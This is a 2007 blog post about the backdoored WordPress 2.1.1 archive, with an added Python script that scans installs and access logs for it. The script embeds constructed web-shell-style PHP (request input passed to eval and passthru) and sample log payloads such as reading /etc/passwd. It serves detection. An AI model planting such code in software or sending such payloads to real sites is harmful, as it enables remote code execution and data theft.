Agnivo Roy

Cracker modifies WordPress 2.1.1, Upgrade ASAP

3 03 2007

About three to four days ago a cracker gained access to a WordPress.org server and modified the then-current release, WordPress 2.1.1, to include a backdoor that allows remote PHP code execution. A user reported the problem to the WordPress team, who took the server down and started investigating.

The cracker obtained user-level access to the server by some means, but touched no file other than the 2.1.1 download archive, probably because it was the most downloaded version at the time. Only two files inside the archive were modified, and the modification lets an attacker execute PHP code remotely on any blog installed from the tampered copy.

Copies of 2.1.1 downloaded more than four days ago are not affected. To remove any doubt, the WordPress team has released version 2.1.2, built from a clean source tree, and recommends overwriting all files when upgrading rather than copying only the changed ones. If you are not sure when your copy was downloaded, treat it as affected and upgrade. If you find any blogs still running 2.1.1, drop a message to the owner.

The modified files are wp-includes/theme.php and wp-includes/feed.php; the injected code takes its payload from the query-string parameters "?iz=" and "?ix=", so requests to those files carrying either parameter in your web server's access log are worth a look. The WordPress team has set up a dedicated email address for this problem: 21securityfaq [AT] wordpress.org. See the official announcement on wordpress.org for details.
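Two quick checks an administrator would want at this point, as an added example (not code from this post or from the WordPress project): scan the PHP files of an install for reads of the reported "iz"/"ix" parameters (and, more generally, for a request parameter handed straight to eval()/passthru()-style sinks), and scan the web server's access log for requests that carried either parameter. The PHP snippets and log lines embedded below are constructed to resemble the reported backdoor, not the real injected code; the log parser assumes Apache/nginx common or combined format.

```python
"""Check a WordPress install and its access log for the March 2007 2.1.1 backdoor.

Added example, not from the original post or the WordPress project. It relies only
on the reported facts (files under wp-includes/ modified, payloads delivered via the
?iz= and ?ix= query parameters); the PHP and log samples below are constructed.
"""
import os
import re
from urllib.parse import parse_qs, urlsplit

# Query parameters the backdoor read, per the WordPress announcement.
BACKDOOR_PARAMS = ("iz", "ix")

# Any read of those parameters from a request superglobal, e.g. $_GET["iz"].
PARAM_RE = re.compile(
    r'\$_(?:GET|POST|REQUEST)\s*\[\s*["\'](?:' + "|".join(BACKDOOR_PARAMS) + r')["\']\s*\]'
)
# Generic check: a code/command sink fed directly from a request superglobal,
# which also catches variants that use a different parameter name.
SINK_RE = re.compile(
    r'\b(?:eval|assert|passthru|system|exec|shell_exec|popen|proc_open)'
    r'\s*\(\s*\$_(?:GET|POST|REQUEST)\b'
)
# Apache/nginx common or combined log line; only the fields used here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_source(text):
    """Return (line_no, kind, line) for each suspicious line in one PHP file's text."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        if PARAM_RE.search(line):
            hits.append((no, "backdoor-param", line.strip()))
        elif SINK_RE.search(line):
            hits.append((no, "request-to-sink", line.strip()))
    return hits


def scan_install(root):
    """Walk a WordPress tree; return {relative_path: hits} for every .php file with hits."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as f:
                hits = scan_source(f.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def scan_access_log(lines):
    """Return one dict per request that carried an iz/ix parameter, with the payload decoded."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        query = parse_qs(parts.query)
        for param in BACKDOOR_PARAMS:
            if param in query:
                hits.append({
                    "ip": m.group("ip"), "time": m.group("ts"), "path": parts.path,
                    "param": param, "payload": query[param][0], "status": m.group("status"),
                })
    return hits


# Constructed sample: the parameter reaches eval() through a wrapper function, so a
# grep for "eval($_GET" alone would miss it, while the parameter-name check does not.
SAMPLE_THEME_PHP = r'''<?php
function get_theme_data($theme_file) { return array(); }
function comment_text_phpfilter($filterdata) {
    eval($filterdata);
}
if ($_GET["iz"]) { comment_text_phpfilter($_GET["iz"]); }
?>'''

# Constructed sample: a direct sink fed from a differently named parameter.
SAMPLE_GENERIC_PHP = r'''<?php
if (isset($_REQUEST['c'])) { passthru($_REQUEST['c']); }
?>'''

# Constructed access-log lines (RFC 5737 test addresses); payloads are URL-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Mar/2007:10:14:02 +0000] "GET /wp-includes/theme.php?iz=phpinfo%28%29%3B HTTP/1.1" 200 512
198.51.100.7 - - [01/Mar/2007:10:15:30 +0000] "GET /?p=12 HTTP/1.1" 200 8120
203.0.113.5 - - [01/Mar/2007:10:16:11 +0000] "GET /wp-includes/feed.php?ix=id%3Bcat+%2Fetc%2Fpasswd HTTP/1.1" 200 1204
192.0.2.9 - - [01/Mar/2007:10:17:00 +0000] "GET /wp-rss2.php HTTP/1.1" 200 3402
"""

if __name__ == "__main__":
    print("theme.php sample:", scan_source(SAMPLE_THEME_PHP))
    print("generic sample:", scan_source(SAMPLE_GENERIC_PHP))
    for hit in scan_access_log(SAMPLE_LOG.splitlines()):
        print(hit)
```

Run scan_install("/path/to/wordpress") against a live install; any hit in wp-includes/theme.php or wp-includes/feed.php on a 2.1.1 site is a strong sign the tampered archive was used, and a log hit with a 200 status means the payload most likely ran, so the host should be treated as compromised rather than merely upgraded.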

As for myself, my 2.1.1 archive downloads were made about 6-7 days ago, so I can skip upgrading for the time being. But don't take chances like me; it's serious! ;)


Posted on March 3, 2007 and Last Updated on June 2, 2007 in Internet, SEO & Tech.
